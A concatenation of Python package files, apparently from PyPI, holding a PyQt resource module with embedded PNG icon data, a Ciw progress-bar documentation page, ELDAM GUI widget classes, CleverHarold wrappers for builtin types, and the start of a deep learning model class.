\x6d\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\
\x68\x6f\x6d\x65\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\x6e\x65\x77\
\x73\x69\x74\x65\x2f\x77\x77\x77\x2e\x65\x61\x73\x79\x69\x63\x6f\
\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\x65\x61\
\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\x73\x2f\
\x31\x32\x32\x2f\x31\x32\x32\x32\x36\x34\x35\x2e\x70\x6e\x67\x37\
\xad\x77\xd7\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\
\x00\x00\x06\x42\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x46\x00\x00\x00\x40\x08\x04\x00\x00\x00\x0d\x7e\xc9\x12\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x00\x02\
\x62\x4b\x47\x44\x00\x00\xaa\x8d\x23\x32\x00\x00\x00\x09\x70\x48\
\x59\x73\x00\x00\x01\x2c\x00\x00\x01\x2c\x00\x73\x88\xe9\x52\x00\
\x00\x00\x07\x74\x49\x4d\x45\x07\xe3\x01\x09\x03\x2e\x36\xda\x97\
\x87\x5a\x00\x00\x03\x39\x49\x44\x41\x54\x68\xde\xed\x99\x3d\x48\
\x5b\x51\x14\xc7\x7f\xc6\x08\xc5\x6f\x63\x89\x20\x0e\x82\x8b\x50\
\x41\x1d\x2c\xd2\x22\x86\x82\x52\x6b\x71\x71\x70\xb0\x0e\xa2\x15\
\xdd\xc4\x4d\x2b\x38\x08\x2e\x22\x28\x95\x22\x2e\x0e\x9d\x8a\x60\
\xa0\x68\xe9\xe0\x17\x88\x1d\xaa\x52\x04\x8b\x50\x1c\x14\x8a\x43\
\xfa\xa1\xf1\xa3\x0d\x46\xfb\x3a\x48\xe2\x3d\x2f\x4f\x93\x98\x97\
\xb8\xbc\x73\xa6\xc3\xfd\xdf\x73\x7e\xef\xe6\xde\xf7\x5e\xce\x4b\
\xe2\xca\x9c\x34\xf0\x94\x07\x64\x93\x4c\xfc\xed\x82\x43\xbe\xf2\
\x91\xf7\x78\xf4\x43\x76\xea\x58\xe2\x0c\x2d\xc1\x7e\xc6\x12\x75\
\xd8\x55\x94\x5c\xc6\xf1\x26\x1c\x24\xe0\x5e\xc6\xc9\x0d\xa0\xa4\
\x32\x79\x67\x20\x01\x9f\x24\xf5\x12\xa6\x01\xdf\x9d\xc3\xf8\x68\
\x00\xc8\x60\xf6\xce\x51\x34\x34\x66\xc9\xb0\x53\x4b\xb5\xd8\xe3\
\x9f\x59\xc5\x4b\x52\x9c\xcf\x92\x46\x16\x8f\x79\xa8\x9c\xdb\x6a\
\x6a\x61\x4a\xa1\xbb\x60\x04\x47\x02\x8e\xf5\xa5\x39\x18\xe1\x42\
\xa9\x3e\x05\xeb\x4a\xb8\x81\x33\x61\x28\x00\x4e\x36\x94\xea\xeb\
\x36\xb2\x95\xc1\xcd\xd0\x1b\x50\x5c\xcd\xc3\xa6\x12\x65\xdb\xb0\
\x29\xa1\x2f\xa1\x28\xfa\x8a\x36\xdb\xad\xd3\xc4\xc1\x2c\x18\x0b\
\xc6\x82\xb1\x60\x2c\x18\x0b\xc6\x82\xb1\x60\x2c\x18\x0b\xc6\x82\
\xb1\x60\x2c\x18\x0b\xe6\x2e\x61\x4a\x28\x31\x23\x8d\x3d\xf6\x14\
\x38\x79\x0d\x34\xc5\xde\xc1\x88\x7d\x65\xd2\x19\xc4\x85\x8b\x41\
\xd2\x63\x87\xd1\x94\x28\xfa\x66\x74\x12\xdd\xb4\x03\xd0\x4e\xf7\
\x2d\x9a\x6f\x6a\x45\x0d\xb6\x94\xde\xd1\x42\xa0\x01\x1a\xb1\xd5\
\x73\x10\x9c\x7d\x40\x7d\x94\xb3\x53\x59\x50\xaa\x6f\xc1\x8c\x12\
\x9e\xd2\x16\x55\x32\x07\x8b\xa2\x63\xb9\x18\x65\x47\xb0\x8d\x53\
\x65\xf6\x8c\x9d\x79\x9e\x93\x12\x24\x1d\xa6\x94\x45\x8e\x0d\x17\
\xfc\x82\x2f\x1c\x2a\xf1\x3d\xfa\x70\x09\x85\x8b\x3e\xfa\x45\x37\
\x2a\x9b\x72\xc3\x1f\x5f\x23\x83\x27\xbc\x50\x7e\x09\x3f\xf3\x90\
\xcf\x9a\xae\x23\xeb\xe7\xaf\x81\xfb\x71\x93\x23\x12\xf6\x18\x7c\
\x6b\x38\xa3\x47\x68\x72\x70\x5f\x9b\x4f\xce\x5c\x23\x1f\xa0\x2b\
\xa2\xa6\xf1\x0e\xe5\xa2\x4c\x0d\x1e\x43\x9d\x87\x1a\xa1\x2b\x67\
\x27\xa2\xfc\x5d\x97\xf2\x3c\x96\xc3\x4a\xfd\xb4\x8a\x12\x85\xa2\
\x65\x2b\x7d\x9d\x42\xa1\x6d\x0d\x59\x85\x50\x5f\x26\x2f\x20\x2f\
\x65\x25\x8c\x78\x9a\x4c\x25\x7d\x32\xc3\x37\xaa\x87\xc5\x3e\xc9\
\x64\x3a\x4c\xf6\x15\x4a\x55\x7a\x27\xfd\xec\xdf\xc0\x5d\x20\xae\
\xb5\x53\x9c\x02\x0d\x37\x6e\x11\x9f\xd2\x29\xf4\x05\x37\xac\xfd\
\x3e\xfd\x46\xad\xf0\x0a\xc6\x58\x63\x9f\x63\xfe\x28\xee\x63\x87\
\x4a\xa1\xab\xd2\x61\x6f\x52\x44\x11\x9b\xba\x12\x55\x62\x4e\x25\
\x3b\xf8\x44\xde\x63\xf6\x59\x63\x8c\x8a\x2b\x91\xfe\x08\xe7\xe0\
\x24\x37\x78\xd4\x2f\x15\x3f\xd9\x12\x57\xf9\x8e\x47\x4a\xfc\x9b\
\x16\x3e\x00\xcf\x78\x2b\xee\x32\x9f\x68\xe2\xbb\x12\x97\x70\x5f\
\xdc\xed\xfd\xfc\xc2\xc3\x01\x31\x58\x0a\x13\x62\x05\xce\xe9\x0d\
\x8e\xf5\x72\x2e\xc6\x26\xc4\x45\xc5\xc1\x9a\x39\x11\x05\xa7\x48\
\x0b\x8e\xa5\x89\x2f\x34\x1a\x27\x34\xc7\x13\xa5\x82\x5d\x51\x6e\
\x9b\x62\x31\x5e\xcc\xb6\x18\xdf\x55\x77\x84\xb9\x96\x27\x1e\x6b\
\x1a\x5e\x1a\x43\x34\x8d\xba\x0f\xaf\x0b\x57\xf7\x0f\x33\x2d\x85\
\x51\xdd\x6e\x19\x30\xd4\x0d\xe8\x76\xce\x68\xe4\x3b\x27\xf2\x37\
\xbd\x97\x74\x88\xd8\x4b\x16\xaf\x42\x5e\xce\xfe\x91\x85\x57\x9c\
\xaa\x0e\xbe\xf1\xc6\xdc\x75\x29\x63\x2f\xa2\x27\x8c\x91\xef\x51\
\x66\x26\x8a\x83\xb9\x5b\xa3\x68\x68\xcc\x99\xf7\xe5\xd3\xc6\x50\
\x4c\x28\x1a\x1a\x43\x66\xfd\x29\x6a\xe1\x28\x66\x98\x23\x5a\xcc\
\x40\x71\x5d\xf3\xde\x12\xad\x7b\x74\x6f\x85\x06\x16\xee\x34\xa5\
\xd0\x88\x9d\x1f\x26\x5c\x94\x9d\x46\x56\xf1\xdf\x24\xf9\x0f\x54\
\xf4\xd4\xb6\x0e\xa6\x7b\xac\x00\x00\x00\x25\x74\x45\x58\x74\x64\
\x61\x74\x65\x3a\x63\x72\x65\x61\x74\x65\x00\x32\x30\x31\x39\x2d\
\x30\x31\x2d\x30\x39\x54\x30\x33\x3a\x34\x36\x3a\x35\x34\x2b\x30\
\x38\x3a\x30\x30\xa7\x9d\xfe\x1a\x00\x00\x00\x25\x74\x45\x58\x74\
\x64\x61\x74\x65\x3a\x6d\x6f\x64\x69\x66\x79\x00\x32\x30\x31\x39\
\x2d\x30\x31\x2d\x30\x39\x54\x30\x33\x3a\x34\x36\x3a\x35\x34\x2b\
\x30\x38\x3a\x30\x30\xd6\xc0\x46\xa6\x00\x00\x00\x43\x74\x45\x58\
\x74\x73\x6f\x66\x74\x77\x61\x72\x65\x00\x2f\x75\x73\x72\x2f\x6c\
\x6f\x63\x61\x6c\x2f\x69\x6d\x61\x67\x65\x6d\x61\x67\x69\x63\x6b\
\x2f\x73\x68\x61\x72\x65\x2f\x64\x6f\x63\x2f\x49\x6d\x61\x67\x65\
\x4d\x61\x67\x69\x63\x6b\x2d\x37\x2f\x2f\x69\x6e\x64\x65\x78\x2e\
\x68\x74\x6d\x6c\xbd\xb5\x79\x0a\x00\x00\x00\x63\x74\x45\x58\x74\
\x73\x76\x67\x3a\x63\x6f\x6d\x6d\x65\x6e\x74\x00\x20\x47\x65\x6e\
\x65\x72\x61\x74\x6f\x72\x3a\x20\x41\x64\x6f\x62\x65\x20\x49\x6c\
\x6c\x75\x73\x74\x72\x61\x74\x6f\x72\x20\x31\x36\x2e\x30\x2e\x30\
\x2c\x20\x53\x56\x47\x20\x45\x78\x70\x6f\x72\x74\x20\x50\x6c\x75\
\x67\x2d\x49\x6e\x20\x2e\x20\x53\x56\x47\x20\x56\x65\x72\x73\x69\
\x6f\x6e\x3a\x20\x36\x2e\x30\x30\x20\x42\x75\x69\x6c\x64\x20\x30\
\x29\x20\x20\x72\x0b\x75\x96\x00\x00\x00\x18\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3a\x3a\
\x50\x61\x67\x65\x73\x00\x31\xa7\xff\xbb\x2f\x00\x00\x00\x18\x74\
\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\
\x3a\x48\x65\x69\x67\x68\x74\x00\x33\x33\x35\x27\x52\xd8\x12\x00\
\x00\x00\x17\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\
\x61\x67\x65\x3a\x3a\x57\x69\x64\x74\x68\x00\x33\x36\x39\xc0\x62\
\x30\x21\x00\x00\x00\x19\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\
\x3a\x4d\x69\x6d\x65\x74\x79\x70\x65\x00\x69\x6d\x61\x67\x65\x2f\
\x70\x6e\x67\x3f\xb2\x56\x4e\x00\x00\x00\x17\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x4d\x54\x69\x6d\x65\x00\x31\x35\x34\x36\
\x39\x37\x36\x38\x31\x34\x7c\x39\x0e\x82\x00\x00\x00\x11\x74\x45\
\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x53\x69\x7a\x65\x00\x33\x39\
\x32\x31\x42\x83\x93\x35\x05\x00\x00\x00\x62\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\x2f\
\x2f\x2f\x68\x6f\x6d\x65\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\x6e\
\x65\x77\x73\x69\x74\x65\x2f\x77\x77\x77\x2e\x65\x61\x73\x79\x69\
\x63\x6f\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\
\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\
\x73\x2f\x31\x31\x38\x2f\x31\x31\x38\x37\x34\x32\x33\x2e\x70\x6e\
\x67\x89\xec\x0c\x47\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\
\x82\
"
qt_resource_name = b"\
\x00\x03\
\x00\x00\x59\xfd\
\x00\x53\
\x00\x69\x00\x6d\
\x00\x06\
\x07\x03\x7d\xc3\
\x00\x69\
\x00\x6d\x00\x61\x00\x67\x00\x65\x00\x73\
\x00\x08\
\x05\xe2\x59\x27\
\x00\x6c\
\x00\x6f\x00\x67\x00\x6f\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x09\
\x0c\x98\xba\x47\
\x00\x70\
\x00\x61\x00\x75\x00\x73\x00\x65\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x08\
\x02\x8c\x59\xa7\
\x00\x70\
\x00\x6c\x00\x61\x00\x79\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x09\
\x0a\x28\x82\xa7\
\x00\x63\
\x00\x79\x00\x63\x00\x6c\x00\x65\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x4c\x00\x00\x00\x00\x00\x01\x00\x00\x37\xcc\
\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x62\x00\x00\x00\x00\x00\x01\x00\x00\x40\x40\
\x00\x00\x00\x34\x00\x00\x00\x00\x00\x01\x00\x00\x2f\xea\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x4c\x00\x00\x00\x00\x00\x01\x00\x00\x37\xcc\
\x00\x00\x01\x77\xbf\x82\x6b\xbc\
\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x77\xce\x26\xc1\xd4\
\x00\x00\x00\x62\x00\x00\x00\x00\x00\x01\x00\x00\x40\x40\
\x00\x00\x01\x77\xbf\x82\x6b\xbb\
\x00\x00\x00\x34\x00\x00\x00\x00\x00\x01\x00\x00\x2f\xea\
\x00\x00\x01\x77\xbf\x82\x6b\xbb\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources() | PypiClean |
/Ciw-3.0.0.tar.gz/Ciw-3.0.0/docs/Guides/progressbar.rst | .. _progress-bar:
===============================
How to Implement a Progress Bar
===============================
For an individual run of a simulation, Ciw can enable a progress bar to appear.
This can help visualise how far through a simulation run currently is.
A progress bar may be implemented when using the methods :code:`simulate_until_max_time` and :code:`simulate_until_max_customers`.
In order to implement this, add the option :code:`progress_bar=True`.
An example when using the :code:`simulate_until_max_time` method::
>>> Q.simulate_until_max_time(2000.0, progress_bar=True) # doctest:+SKIP
The image below shows an example of the output:
.. image:: ../_static/progress_bar_time.png
:scale: 100 %
:alt: Output of progress bar (simulate_until_max_time).
:align: center
An example when using the :code:`simulate_until_max_customers` method::
>>> Q.simulate_until_max_customers(20000, progress_bar=True) # doctest:+SKIP
And the image below shows the output:
.. image:: ../_static/progress_bar_customers.png
:scale: 100 %
:alt: Output of progress bar (simulate_until_max_customers).
:align: center | PypiClean |
/ELDAM_LCA-1.0-py3-none-any.whl/eldam/gui/widgets/base_widgets.py | from abc import ABCMeta, abstractmethod
import os
import re
from PyQt5 import uic
from PyQt5.QtWidgets import QWidget, QTreeWidgetItem
from PyQt5.QtGui import QColor
from eldam.gui.dialogs import WarningDialog
from eldam.gui.gui_parameters import *
from eldam.core.parameters import PROCESS_ATTRIBUTES, PRODUCT_FLOW_ATTRIBUTES, TECHNOSPHERE_FLOW_ATTRIBUTES, \
BIOSPHERE_FLOW_ATTRIBUTES, INPUT_PARAMETERS_ATTRIBUTES, CALCULATED_PARAMETERS_ATTRIBUTES
from eldam.utils.observer import Suscriber
from eldam.utils.gui import name_from_pattern
from eldam.utils.exceptions import ConversionError
class EldamWidget(QWidget):
""" Base class used by every top level widgets """
StandardMessage = 1
SuccessMessage = 2
ErrorMessage = 3
def __init__(self, ui_file, *args, **kwargs):
"""
Args:
ui_file (str): Path to QtDesigner .ui file
"""
super().__init__(*args, **kwargs)
self.ui = uic.loadUi(ui_file, self)
def show_message(self, message, message_type=StandardMessage, time=STATUS_BAR_MESSAGES_TIME):
if message_type == self.SuccessMessage:
self.window().statusBar.setStyleSheet(STATUS_BAR_SUCCESS_STYLESHEET)
elif message_type == self.ErrorMessage:
self.window().statusBar.setStyleSheet(STATUS_BAR_ERROR_STYLESHEET)
else:
self.window().statusBar.setStyleSheet(STATUS_BAR_DEFAULT_STYLESHEET)
self.window().statusBar.showMessage(message, time)
class AbcAndPyQtMeta(type(QWidget), ABCMeta):
""" Class used to solve metaclass conflicts and allow to inherit from ABC classes and PyQt classes """
class EldamWidgetWithProgressBar(EldamWidget, Suscriber, metaclass=AbcAndPyQtMeta):
def update(self, step, current, total):
""" Function used by the observer pattern """
self.update_progressbar(step, current, total)
def update_progressbar(self, step, current, total):
"""
Updates the progressbar
Can be triggered manually or by the overridden method update() of the Suscriber parent class
Args:
step (str): Current Step
current (int): Current value
total (int): Maximum value
"""
if current == total:
self.show_message(message_type=EldamWidget.SuccessMessage, message=step)
else:
self.show_message(f"{step}...", time=-1) # time=-1 keeps the message alive until it is changed
# Avoiding the "infinite" progressbar display
if total == 0:
total = 1
self.progressBar.setRange(0, total)
self.progressBar.setValue(current)
class EldamWidgetWithProcessSummary(EldamWidget):
""" Widgets with a processes_summary QLabel """
def update_processes_summary(self, message: str, color: str = None):
""" Update the message in the process summary label """
if not color:
color = "black"
self.processes_summary.setText(message)
self.processes_summary.setStyleSheet("QLabel{color: " + color + "};}")
class EldamConversionWidget(EldamWidgetWithProcessSummary, metaclass=AbcAndPyQtMeta):
""" Special class for ELDAM widgets with a tree widget to display processes and methods to convert processes """
# Constants used to set the state of the TreeWidget
DETAILED_VIEW = 1
QUALITY_CHECK = 2
def __init__(self, ui_file, *args, **kwargs):
super().__init__(ui_file, *args, **kwargs)
self.processes = list()
self.exports_parameters = list()
# Setting TreeWidget first column width
self.treeWidget.setColumnWidth(0, 250)
# Alternating row colors
self.treeWidget.setAlternatingRowColors(True)
# Adding a separator between columns
self.treeWidget.setStyleSheet(QTREEWIDGET_STYLESHEET)
self.display_mode = self.DETAILED_VIEW # Setting the default tree widget display mode
self.toggle_display_button.clicked.connect(self.toggle_display_mode)
self.main_button.clicked.connect(self.convert)
def toggle_display_mode(self):
""" Changes the display mode from detailed view to quality check and inversely """
if self.display_mode == self.DETAILED_VIEW:
self.show_quality_check_view()
elif self.display_mode == self.QUALITY_CHECK:
self.show_detailed_view()
@abstractmethod
def read_processes(self):
""" Read the input files """
def show_detailed_view(self):
""" Display the read processes in the tree widget """
# Setting the display mode
if self.display_mode == self.QUALITY_CHECK:
self.toggle_display_button.setText("Quality check") # Changing the button text
self.display_mode = self.DETAILED_VIEW
# Updating the process summary
if len(self.processes) > 0:
self.update_processes_summary(message=PROCESSES_READ_MESSAGE.format(len(self.processes)))
# Removing previous data
self.treeWidget.clear()
# Building the tree widget
for process in self.processes:
process_item = QTreeWidgetItem(self.treeWidget, [process.name or 'Process with no name'])
process_item.setExpanded(True)
for attr in PROCESS_ATTRIBUTES.items():
QTreeWidgetItem(process_item, [attr[1], str(getattr(process, attr[0]) or '')])
# Inserting flows
# Product flows
product_flows_item = QTreeWidgetItem(process_item, ['Product flows',
f"{len(process.product_flows)} product flow(s)"])
for flow in process.product_flows:
flow_item = QTreeWidgetItem(product_flows_item, [flow.type, flow.name])
for attr in PRODUCT_FLOW_ATTRIBUTES.items():
QTreeWidgetItem(flow_item, [attr[1], str(getattr(flow, attr[0]) or '')])
# Technosphere flows
technosphere_flows_item = QTreeWidgetItem(process_item, ['Technosphere flows',
f"{len(process.technosphere_flows)} "
f"technosphere flow(s)"])
for flow in process.technosphere_flows:
flow_item = QTreeWidgetItem(technosphere_flows_item, [flow.type, flow.name])
for attr in TECHNOSPHERE_FLOW_ATTRIBUTES.items():
QTreeWidgetItem(flow_item, [attr[1], str(getattr(flow, attr[0]) or '')])
# Biosphere flows
biosphere_flows_item = QTreeWidgetItem(process_item, ['Biosphere flows',
f"{len(process.biosphere_flows)} biosphere flow(s)"])
for flow in process.biosphere_flows:
flow_item = QTreeWidgetItem(biosphere_flows_item, [flow.type, flow.name])
for attr in BIOSPHERE_FLOW_ATTRIBUTES.items():
QTreeWidgetItem(flow_item, [attr[1], str(getattr(flow, attr[0]) or '')])
# Parameters
# Input parameters
input_parameters_item = QTreeWidgetItem(process_item, ['Input parameters',
f"{len(process.input_parameters)} "
f"input parameter(s)"])
for parameter in process.input_parameters:
parameter_item = QTreeWidgetItem(input_parameters_item, [parameter.type, parameter.name])
for attr in INPUT_PARAMETERS_ATTRIBUTES.items():
QTreeWidgetItem(parameter_item, [attr[1], str(getattr(parameter, attr[0]) or '')])
# Calculated parameters
calculated_parameters_item = QTreeWidgetItem(process_item, ['Calculated parameters',
f"{len(process.calculated_parameters)} "
f"calculated parameter(s)"])
for parameter in process.calculated_parameters:
parameter_item = QTreeWidgetItem(calculated_parameters_item, [parameter.type, parameter.name])
for attr in CALCULATED_PARAMETERS_ATTRIBUTES.items():
QTreeWidgetItem(parameter_item, [attr[1], str(getattr(parameter, attr[0]) or '')])
def show_quality_check_view(self):
""" Shows a quality data check of the read processes in the tree widget """
# Setting the display mode
if self.display_mode == self.DETAILED_VIEW:
self.toggle_display_button.setText("Detailed view") # Changing the button text
self.display_mode = self.QUALITY_CHECK
# Removing previous data
self.treeWidget.clear()
# Building the tree widget
# Getting processes and flows missing quality data
incomplete_processes = []
for process in self.processes:
incomplete_flows = []
for flow in process.technosphere_flows + process.biosphere_flows:
if len(flow.missing_quality_data) > 0:
incomplete_flows.append(flow)
if len(incomplete_flows) > 0:
process_item = QTreeWidgetItem(self.treeWidget, [process.name or 'Process with no name',
MISSING_QUALITY_DATA_DETAIL_MESSAGE.format(
len(incomplete_flows))])
process_item.setExpanded(True)
incomplete_processes.append(process)
# Technosphere flows
incomplete_technosphere_flows = [flow for flow in incomplete_flows if
flow in process.technosphere_flows]
technosphere_flows_item = QTreeWidgetItem(process_item, ['Technosphere flows',
MISSING_QUALITY_DATA_DETAIL_MESSAGE.format(
len(incomplete_technosphere_flows))])
for flow in incomplete_technosphere_flows:
flow_item = QTreeWidgetItem(technosphere_flows_item, [flow.type, flow.name])
for attr in TECHNOSPHERE_FLOW_ATTRIBUTES.items():
# Inserting attributes with a different background color for missing quality data attributes
attr_item = QTreeWidgetItem(flow_item, [attr[1], str(getattr(flow, attr[0]) or '')])
if attr[0] in flow.missing_quality_data:
attr_item.setBackground(1, QColor('lightcoral'))
# Biosphere flows
incomplete_biosphere_flows = [flow for flow in incomplete_flows if flow in process.biosphere_flows]
biosphere_flows_item = QTreeWidgetItem(process_item, ['Biosphere flows',
MISSING_QUALITY_DATA_DETAIL_MESSAGE.format(
len(incomplete_technosphere_flows))])
for flow in incomplete_biosphere_flows:
flow_item = QTreeWidgetItem(biosphere_flows_item, [flow.type, flow.name])
for attr in BIOSPHERE_FLOW_ATTRIBUTES.items():
# Inserting attributes with a different background color for missing quality data attributes
attr_item = QTreeWidgetItem(flow_item, [attr[1], str(getattr(flow, attr[0]) or '')])
if attr[0] in flow.missing_quality_data:
attr_item.setBackground(1, QColor('lightcoral'))
# Updating the message
if len(self.processes) > 0:
if len(incomplete_processes) == 0:
message = NO_ERRORS_FOUND_MESSAGE.format(len(self.processes))
color = 'green'
else:
message = MISSING_QUALITY_DATA_MESSAGE.format(len(incomplete_processes))
color = 'darkorange'
self.update_processes_summary(message=message, color=color)
def build_export_list(self):
""" Building a list of items containing the process to export and the filename of the export """
self.exports_parameters = [] # Resetting the list
multiple_products_for_file_naming_warning = False
exported_filenames = [] # Storing the saved filenames for comparison
for process in self.processes:
# If multiple processes, generate filename from pattern
if len(self.processes) == 1:
export_filename = self.save_edit.text()
else:
directory, pattern = os.path.split(self.save_edit.text())
if 'PRODUCT' in pattern and process.product is None:
multiple_products_for_file_naming_warning = True
export_filename = name_from_pattern(pattern, process.name or 'process',
process.product.name if process.product is not None
else process.product_flows[0].name)
# Replacing forbidden symbols from filename by "_"
export_filename = re.sub(r'[^\w\-_\. ]', '_', export_filename)
# Looping on already existing filenames to add a number after the file name in case of duplicates
# Removing extension
filename, extension = os.path.splitext(export_filename)
while filename in exported_filenames:
parse = re.search("(?P<filename>.*)_\((?P<number>\d+)\)", filename)
if parse is not None:
number = str(int(parse['number']) + 1)
filename = parse['filename'] + '_(' + number + ')'
else:
filename = filename + '_(2)'
filename = filename + extension
export_filename = os.path.join(directory, filename)
# Adding the export filename to the list
exported_filenames.append(export_filename)
# Adding the export parameters to the list
self.exports_parameters.append({'process': process, 'export_filename': export_filename})
# If a filename have been computed from a pattern using the PRODUCT tag and the corresponding process has
# multiple products, warn the user
if multiple_products_for_file_naming_warning:
WarningDialog(self, title=MULTIPLE_PRODUCTS_FOR_FILE_NAMING_TITLE,
message=MULTIPLE_PRODUCTS_FOR_FILE_NAMING_MESSAGE).exec()
@property
def export_conflicts(self):
""" For each export, check if the file already exists """
return [export for export in self.exports_parameters if os.path.isfile(export['export_filename'])]
@abstractmethod
def resolve_export_conflicts(self):
""" For each export, check if the filename doesn't already exists. If yes, obtain the desired file handling """
@abstractmethod
def export_processes(self):
""" Export the processes from the export parameters list """
def convert(self):
"""
Export the read processes to files of the corresponding output
This function operates in three steps:
1. Building the export list:
2. Resolving export conflicts:
3. Exporting the processes
"""
try:
self.build_export_list()
self.resolve_export_conflicts()
self.export_processes()
except ConversionError:
pass | PypiClean |
/CleverHarold-0.1.tar.gz/CleverHarold-0.1/harold/armor/basetypes.py |
# Copyright 2006 The Incorporated Wizzo Widget Works
# Distributed under the terms of the GNU General Public License v2
# Author: Troy Melhase <troy@gci.net>
##
# Helper module for using builtin types as validators.
#
# The getargspec function in the inspect module does not work with
# builtin types. Since there is no way to introspect the type for
# their call signatures, we provide rough equivalents to them here as
# functions that can be inspected.
#
# Method signatures do not match type signatures in all cases.
# Particularly, slice and xrange signatures are only close. Better
# implementations are possible, but their worth is questionable.
#
##
class marker:
pass
def _bool(x=False):
return bool(x)
def _buffer(object, offset=0, size=-1):
return buffer(object, offset, size)
def _classmethod(function):
return classmethod(function)
def _complex(real, imag=0):
return complex(real, imag)
def _dict(initial=marker, **kwds):
if initial is marker and not kwds:
return dict()
elif initial is marker:
return dict(**kwds)
else:
return dict(initial)
def _enumerate(iterable):
return enumerate(iterable)
def _file(name, mode='r', buffering=marker):
if buffering is marker:
return file(name, mode)
return file(name, mode, buffering)
def _float(x=0.0):
return float(x)
def _frozenset(iterable=marker):
if iterable is marker:
iterable = []
return frozenset(iterable)
def _int(x=0, base=marker):
if base is marker:
return int(x)
else:
return int(x, base)
def _list(initial=marker):
if initial is marker:
return list()
else:
return list(initial)
def _long(x=0, base=marker):
if base is marker:
return long(x)
else:
return long(x, base)
def _object():
return object()
def _property(fget=None, fset=None, fdel=None, doc=None):
return property(fget, fset, fdel, doc)
def _reversed(sequence):
return reversed(sequence)
def _set(iterable=marker):
if iterable is marker:
iterable = []
return set(iterable)
def _slice(start=None, stop=0, step=None):
return slice(start, stop, step)
def _staticmethod(function):
return staticmethod(function)
def _str(object=''):
return str(object)
def _super(typ, typ2=marker):
if typ2 is marker:
return super(type)
return super(typ, typ2)
def _tuple(sequence=marker):
if sequence is marker:
return tuple()
return tuple(sequence)
def _type(object_or_name, bases=marker, namespace=marker):
if bases is marker and namespace is marker:
return type(object_or_name)
if bases is marker:
bases = ()
if namespace is marker:
namespace = {}
return type(object_or_name, bases, namespace)
def _unicode(string, encoding=marker, errors=marker):
if encoding is marker and errors is marker:
return unicode(string)
if errors is marker:
return unicode(string, encoding)
return unicode(string, encoding, errors)
def _xrange(start=marker, stop=None, step=marker):
if start is marker and step is marker:
return xrange(stop)
if step is marker:
return xrange(start, stop)
return xrange(start, stop, step)
##
# A mapping of builtin types to inspectable wrapper functions.
basetypes = {
# basestring cannot be instantiated
bool : _bool,
buffer : _buffer,
classmethod : _classmethod,
complex : _complex,
dict : _dict,
enumerate : _enumerate,
file : _file,
float : _float,
frozenset : _frozenset,
int : _int,
list : _list,
long : _long,
object : _object,
property : _property,
reversed : _reversed,
set : _set,
slice : _slice,
staticmethod : _staticmethod,
str : _str,
super : _super,
tuple : _tuple,
type : _type,
unicode : _unicode,
xrange : _xrange,
} | PypiClean |
/BasicDeepLearningFramework-0.7.0.tar.gz/BasicDeepLearningFramework-0.7.0/Deep_Learning_Framework/model.py | import numpy as np
import math
import Deep_Learning_Framework.layer
import Deep_Learning_Framework.loss
import Deep_Learning_Framework.activations
def change_to_vector(y):
print(len(y))
res = []
for i in range(len(y)):
curr = y[i]
res.append(int(np.argmax(curr)))
return res
def printvec(x):
for row in x:
print(row)
class Model:
def __init__(self, training_method):
self.training_method = training_method
